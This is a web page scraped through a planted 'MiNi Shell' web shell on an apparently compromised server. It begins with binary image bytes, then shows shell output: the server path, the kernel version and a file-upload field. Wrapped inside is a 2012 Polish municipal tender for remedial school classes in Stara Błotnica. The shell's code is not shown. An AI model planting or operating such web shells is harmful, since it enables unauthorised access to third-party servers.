JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20121001/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20121001/374148-N-2012.html

<p class="kh_header"><b>Stara Błotnica: Wyrównywanie szans edukacyjnych w Gminie Stara Błotnica</b><br>
<b>Numer ogłoszenia: 374148 - 2012; data zamieszczenia: 01.10.2012</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Urząd Gminy w Starej Błotnicy , 46, 26-806 Stara Błotnica, woj. mazowieckie, tel. 048 385-77-90, faks 048 383-50-92.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.starablotnica.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Wyrównywanie szans edukacyjnych w Gminie Stara Błotnica.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Przedmiotem zamówienia są usługi edukacyjne obejmujące przeprowadzenie zajęć 
dodatkowych wspierających indywidualizację procesu dydaktycznego w ramach projektu - Wyrównywanie szans edukacyjnych w Gminie Stara Błotnica.

Przedmiot zamówienia podzielony jest na następujące części: 

Zajęcia dodatkowe w Publicznej Szkole Podstawowej w Kaszowie.

Część nr 1 
Zajęcia dla dzieci ze specyficznymi  trudnościami w czytaniu i pisaniu, w tym także zagrożonych ryzykiem dysleksji. 
Grupa I 
12godz w 2012 r. + 18 godz. w 2013 r.; łącznie 30 godzin 
Część nr 2 
Zajęcia dla dzieci ze specyficznymi  trudnościami w czytaniu i pisaniu, w tym także zagrożonych ryzykiem dysleksji. 
Grupa II
12godz w 2012r + 18 godz. w 2013r; łącznie 30 godzin 
Część nr 3 
Zajęcia dla dzieci z trudnościami w zdobywaniu umiejętności matematycznych. 
Grupa I 
12godz w 2012r + 18 godz. w 2013r; łącznie 30 godzin 
Część nr 4
Zajęcia dla dzieci z trudnościami w zdobywaniu umiejętności matematycznych. 
Grupa II 
12godz w 2012r + 18 godz. w 2013r; łącznie 30 godzin 
Część nr 5
Zajęcia logopedyczne dla dzieci z zaburzeniami w rozwoju mowy.
Grupa I
12godz w 2012r + 18 godz. w 2013r; łącznie 30 godzin 

Część nr 6 
Zajęcia z gimnastyki korekcyjnej dla dzieci z wadami postawy.
Dwie odrębne grupy po 30 godz. dla każdej z grup.
24godz w 2012r + 36 godz. w 2013r; łącznie 60 godzin. 

Część  nr 7 
Zajęcia rozwijające zainteresowania uczniów szczególnie uzdolnionych ze szczególnym uwzględnieniem nauk matematyczno-przyrodniczych.
Dwie odrębne grupy po 30 godz. dla każdej z grup.
24godz w 2012r + 36 godz. w 2013r; łącznie 60 godzin 

Zajęcia  dodatkowe w Publicznej Szkole Podstawowej w Starych Sieklukach.
Część nr 8 
Zajęcia dla dzieci ze specyficznymi  trudnościami w czytaniu i pisaniu, w tym także zagrożonych ryzykiem dysleksji. 
Dwie odrębne grupy po 30 godz. dla każdej z grup.
24godz w 2012r + 36 godz. w 2013r; łącznie 60 godzin 
Część nr 9 
Zajęcia dla dzieci z trudnościami w zdobywaniu umiejętności matematycznych. 
Dwie odrębne grupy po 30 godz. dla każdej z grup.
24godz w 2012r + 36 godz. w 2013r; łącznie 60 godzin 
Część nr 10 
Zajęcia rozwijające zainteresowania uczniów szczególnie uzdolnionych ze szczególnym uwzględnieniem nauk matematyczno-przyrodniczych.
Dwie odrębne grupy po 30 godz. dla każdej z grup.
24godz w 2012r + 36 godz. w 2013r; łącznie 60 godzin 

Zajęcia dodatkowe w Publicznej Szkole Podstawowej w Starym Goździe.

Część nr 11 
Zajęcia dla dzieci ze specyficznymi  trudnościami w czytaniu i pisaniu, w tym także zagrożonych ryzykiem dysleksji. 
Grupa I
12godz w 2012r + 18 godz. w 2013r; łącznie 30 godzin 
Część nr 12 
Zajęcia dla dzieci ze specyficznymi  trudnościami w czytaniu i pisaniu, w tym także zagrożonych ryzykiem dysleksji. 
Grupa II
Zajęcia dla dzieci z trudnościami w czytaniu i pisaniu 
12godz w 2012r + 18 godz. w 2013r; łącznie 30 godzin 
Część nr 13 
Zajęcia dla dzieci ze specyficznymi  trudnościami w czytaniu i pisaniu, w tym także zagrożonych ryzykiem dysleksji. 
Grupa III
12godz w 2012r + 18 godz. w 2013r; łącznie 30 godzin 
Część nr 14 
Zajęcia z gimnastyki korekcyjnej dla dzieci z wadami postawy.
Trzy odrębne grupy po 30 godzin dla każdej z grup.
36godz w 2012r + 54 godz. w 2013r; łącznie 90 godzin 

Część nr 15 
Zajęcia rozwijające zainteresowania uczniów szczególnie uzdolnionych ze szczególnym uwzględnieniem nauk matematyczno-przyrodniczych.
Grupa I 
12godz w 2012r + 18 godz. w 2013r; łącznie 30 godzin 

Część nr 16 
Zajęcia rozwijające zainteresowania uczniów szczególnie uzdolnionych ze szczególnym uwzględnieniem nauk matematyczno-przyrodniczych.
Grupa II 
12godz w 2012r + 18 godz. w 2013r; łącznie 30 godzin 
Część nr 17 
Zajęcia rozwijające zainteresowania uczniów szczególnie uzdolnionych ze szczególnym uwzględnieniem nauk matematyczno-przyrodniczych.
Grupa III
12godz w 2012r + 18 godz. w 2013r; łącznie 30 godzin 
Część nr 18 
Zajęcia rozwijające zainteresowania uczniów szczególnie uzdolnionych pod względem artystycznym.
Grupa I
12godz w 2012r + 18 godz. w 2013r; łącznie 30 godzin 
Część nr 19 
Zajęcia rozwijające zainteresowania uczniów szczególnie uzdolnionych pod względem artystycznym.
Grupa II
12godz w 2012r + 18 godz. w 2013r; łącznie 30 godzin 

Zajęcia dodatkowe w Publicznej Szkole Podstawowej w Starej Błotnicy. 
Część 	nr 20 
Zajęcia dla dzieci ze specyficznymi  trudnościami w czytaniu i pisaniu, w tym także zagrożonych ryzykiem dysleksji. 
Grupa I
12godz w 2012r + 18 godz. w 2013r; łącznie 30 godzin 
Część nr 21 
Zajęcia dla dzieci ze specyficznymi  trudnościami w czytaniu i pisaniu, w tym także zagrożonych ryzykiem dysleksji. 
Dwie odrębne grupy po 30 godzin dla każdej z grup.
24godz w 2012r + 36 godz. w 2013r; łącznie 60 godzin 
Część nr 22 
Zajęcia logopedyczne dla dzieci z zaburzeniami w rozwoju mowy.
Cztery odrębne grupy po 30 godzin dla każdej z grup.
48godz w 2012r + 72 godz. w 2013r; łącznie 120 godzin 
Część nr 23 
Zajęcia z gimnastyki korekcyjnej dla dzieci z wadami postawy.
Trzy odrębne grupy po 30 godz. dla każdej z grup.
36godz w 2012r + 54 godz. w 2013r; łącznie 90 godzin 

Część nr 24 

Zajęcia rozwijające zainteresowania uczniów szczególnie uzdolnionych ze szczególnym uwzględnieniem nauk matematyczno-przyrodniczych.
Grupa I
12godz w 2012r + 18 godz. w 2013r; łącznie 30 godzin 




Część 25 

Zajęcia rozwijające zainteresowania uczniów szczególnie uzdolnionych ze szczególnym uwzględnieniem nauk matematyczno-przyrodniczych.
Dwie odrębne grupy po 30 godz. dla każdej z grup.
24godz w 2012r + 36 godz. w 2013r; łącznie 60 godzin 

Uwaga: 

Jedna godzina zajęć jest rozumiana jako 45 minut (godzina lekcyjna), z wyjątkiem zajęć 
z logopedii, gdzie jedna godzina zajęć jest rozumiana jako 60 minut. 

Wymagania i obowiązki dotyczące Wykonawców w częściach nr 1-25 zamówienia: 

1. Wykonawcy poszczególnych zadań muszą spełniać następujące wymogi dotyczące 
wykształcenia: kwalifikacje do prowadzenia określonych zajęć zgodnie z Rozporządzeniem 
Ministra Edukacji Narodowej z dnia 12 marca 2009 r. w sprawie szczegółowych kwalifikacji 
wymaganych od nauczycieli oraz określenia szkół i wypadków, w których można zatrudnić 
nauczycieli niemających wyższego wykształcenia lub ukończonego zakładu kształcenia nauczycieli (Dz. U. z 2009r Nr 50 poz. 400 ) 
2. Zamawiający wymaga, aby prowadzenie zajęć w ramach projektu odbywało się 
na terenie danej szkoły, której dotyczą zadania, w czasie uzgodnionym z dyrektorem szkoły. 
3. Opracowanie w terminie 5 dni od daty zawarcia umowy o udzielenie zamówienia 
publicznego planu pracy zajęć pozalekcyjnych (obejmującego harmonogram oraz zakres zadania) i przedstawienie do akceptacji dyrektorowi szkoły. 
4. Prowadzenie zajęć pozalekcyjnych zgodnie z zatwierdzonym planem pracy w terminie od 
dnia podpisania umowy do 31 maja 2013 roku. zgodnie z opisem przedmiotu 
zamówienia. 
5. Dokumentowanie zajęć pozalekcyjnych w dzienniku zajęć. 
6. Promocja i ewaluacja projektu -informowanie o współfinansowaniu projektu ze środków 
Europejskiego Funduszu Społecznego. 
7. Przeprowadzenie ewaluacji zajęć. 
8. Ponoszenie odpowiedzialności materialnej za powierzone mienie. 
9. Przestrzeganie regulaminu obowiązującego w pracowni, w której prowadzi zajęcia, 
10. Stosowanie odpowiednich norm, metod i środków dydaktycznych do prowadzenia zajęć 
11. Bieżące informowanie dyrektora szkoły o problemach mogących mieć wpływ na terminową bądź prawidłową realizację przedmiotu umowy. 
13. Prowadzić ewidencję godzin pracy.
14.Wykonawca zobowiązany jest prowadzić zajęcia systematycznie i cyklicznie to znaczy zajęcia muszą być rozplanowane w poszczególnych miesiącach w okresie trwania projektu (od października 2012 r. do maj 2013 r.).Liczba godzin przeprowadzanych zajęć pozalekcyjnych w poszczególnych tygodniach danego miesiąca powinna być również w miarę możliwości wykonywana proporcjonalnie. Liczba godzin pozalekcyjnych w ciągu jednego miesiąca nie może wynieść więcej niż 6 godz..</p>
<p><b>II.1.4) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p>

<p><b>II.1.5) Wspólny Słownik Zamówień (CPV):</b> 80.00.00.00-4, 80.10.00.00-5.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty częściowej:</b> tak, liczba części: 25.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 31.05.2013.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> Zamawiający odstępuje od obowiązku wniesienia wadium.</p>
<p><b>III.2) ZALICZKI</b></p>
<ul class="kh_indent_1"><li><b>Czy przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b> nie</li></ul>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>podpisane oświadczenie o spełnianiu warunków udziału w postępowaniu, zgodnie z art. 22 ust.1 ustawy Pzp -Załącznik nr 2 do SIWZ</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>podpisane oświadczenie o spełnianiu warunków udziału w postępowaniu, zgodnie z art. 22 ust.1 ustawy Pzp -Załącznik nr 2 do SIWZ</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>podpisane -oświadczenie o spełnianiu warunków udziału w postępowaniu, zgodnie z art. 22 ust.1 ustawy Pzp -Załącznik nr 2 do SIWZ</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>a) wykonawca na części nr 1, 2, 8, 11, 12, 13, 20, 21 zamówienia powinien dysponować osobą posiadającą wykształcenie wyższe  z zakresu edukacji wczesnoszkolnej lub nauczania początkowego oraz posiadać co najmniej 6-miesięczne doświadczenie w zawodzie nauczyciela, 
b) wykonawca na części nr 5,22, zamówienia powinien dysponować osobą posiadającą wykształcenie wyższe magisterskie  w zakresie pedagogika ogólna oraz  studia podyplomowe w zakresie logopedii oraz posiadać co najmniej 6-miesięczne doświadczenie w zawodzie nauczyciela, 
c) wykonawca na części 6,14,23, zamówienia powinien dysponować osobą posiadającą wykształcenie wyższe (licencjat lub magister) z przygotowaniem pedagogicznym oraz studia wyższe (licencjat lub magister) lub studia  podyplomowe z wychowania fizycznego z korektywą bądź kurs kwalifikacyjny z zakresu gimnastyki korekcyjnej oraz posiadać co najmniej 6-miesięczne doświadczenie w zawodzie nauczyciela 
d) wykonawca na części nr 3,4,9 zamówienia powinien dysponować osobą posiadającą 
wykształcenie wyższe magisterskie z zakresu edukacji wczesnoszkolnej lub nauczania początkowego oraz posiadać co najmniej 6-miesięczne doświadczenie w zawodzie nauczyciela 
e) wykonawca na części nr 7,10,15,16,17,24,25 zamówienia powinien dysponować 
osobą posiadającą wykształcenie wyższe magisterskie z zakresu edukacji wczesnoszkolnej lub nauczania początkowego oraz posiadać co najmniej 6-miesięczne doświadczenie w zawodzie nauczyciela. 
f) wykonawca na części nr 18,19 zamówienia powinien dysponować osobą posiadającą wykształcenie wyższe z zakresu edukacji wczesnoszkolnej lub nauczania początkowego oraz posiadać co najmniej 6-miesięczne doświadczenie w zawodzie nauczyciela.
Spełnieniem tego warunku będzie podpisane oświadczenie  zał.nr 6 do SIWZ</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>podpisane oświadczenie o spełnianiu warunków udziału w postępowaniu, zgodnie z art. 22 ust.1 ustawy Pzp -Załącznik nr 2 do SIWZ</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<ul class="kh_indent_1"><li>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnieniu warunków udziału w postępowaniu, należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz osób, które będą uczestniczyć w wykonywaniu zamówienia, w szczególności odpowiedzialnych za świadczenie usług, kontrolę jakości lub kierowanie robotami budowlanymi, wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych dla wykonania zamówienia, a także zakresu wykonywanych przez nie czynności, oraz informacją o podstawie do dysponowania tymi osobami</li>

</ul></li>

<li><p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru, jeżeli odrębne przepisy wymagają wpisu do rejestru, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert, a w stosunku do osób fizycznych oświadczenie w zakresie art. 24 ust. 1 pkt 2 ustawy</li>

</ul></li>
<li>
<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

</ul></li>
</ul>

<p><b>III.7) Czy ogranicza się możliwość ubiegania się o zamówienie publiczne tylko dla wykonawców, u których ponad 50 % pracowników stanowią osoby niepełnosprawne: </b>nie</p>


<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.2.2) Czy przeprowadzona będzie aukcja elektroniczna:</b> nie.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>Czy przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b>tak</p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>Zamawiający przewiduje możliwość zmian postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy w następującym zakresie: 
a) W przypadku wystąpienia siły wyższej (Siła wyższa - zdarzenie lub połączenie zdarzeń obiektywnie niezależnych od Stron, które zasadniczo i istotnie utrudniają wykonywanie części lub całości zobowiązań wynikających z umowy, których Strony nie mogły przewidzieć i którym nie mogły zapobiec ani ich przezwyciężyć i im przeciwdziałać poprzez działanie z należytą starannością ogólnie przewidzianą dla cywilnoprawnych stosunków zobowiązaniowych.),
b) W przypadku wystąpienia zmian powszechnie obowiązujących przepisów prawa
   w zakresie mającym wpływ na realizację umowy.
c) wynagrodzenie wykonawcy określone w umowie może ulec zmianom w następujących 
przypadkach: 
-zmiana stawki urzędowej podatku VAT, 
-rezygnacji z części usług, jeśli taka rezygnacja będzie niezbędna do prawidłowej realizacji 
przedmiotu umowy - o wartość niewykonanych usług, 
d) inne zmiany: 
-w zakresie podwykonawstwa za uprzednią zgodą zamawiającego: 
-powierzenie podwykonawcom innej części zamówienia niż wskazana w ofercie wykonawcy, 
-zmiana podwykonawcy na etapie realizacji zamówienia, o ile nie sprzeciwia się to 
postanowieniom SIWZ, 
e) warunki zmian: 
-inicjowanie zmian - na wniosek Wykonawcy lub Zamawiającego, 
-uzasadnienie zmian - prawidłowa realizacja przedmiotu umowy, obniżenie kosztów, 
-forma zmian - aneks do umowy w formie pisemnej pod rygorem nieważności.</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.starablotnica.bip.org.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Urząd Gminy Stara Błotnica,
 26-806 Stara Błotnica,
 Stara Błotnica 46.
Pokój nr 12.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 12.10.2012 godzina 10:00, miejsce: Urząd Gminy Stara Błotnica,
 26-806 Stara Błotnica,
 Stara Błotnica 46
pokój nr 12.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>




<p><b>IV.4.16) Informacje dodatkowe, w tym dotyczące finansowania projektu/programu ze środków Unii Europejskiej:</b> Projekt jest współfinansowany przez Unię Europejską ze środków Europejskiego Funduszu Społecznego w ramach Priorytetu IX. Rozwój wykształcenia i kompetencji w regionach, Działanie 9.1. Wyrównywanie szans edukacyjnych i zapewnienie wysokiej jakości usług edukacyjnych świadczonych w systemie oświaty, 
Poddziałanie 9.1.2. Wyrównywanie szans edukacyjnych uczniów z grup o utrudnionym dostępie do edukacji oraz zmniejszenie różnic w jakości usług edukacyjnych..</p>
<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> tak</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com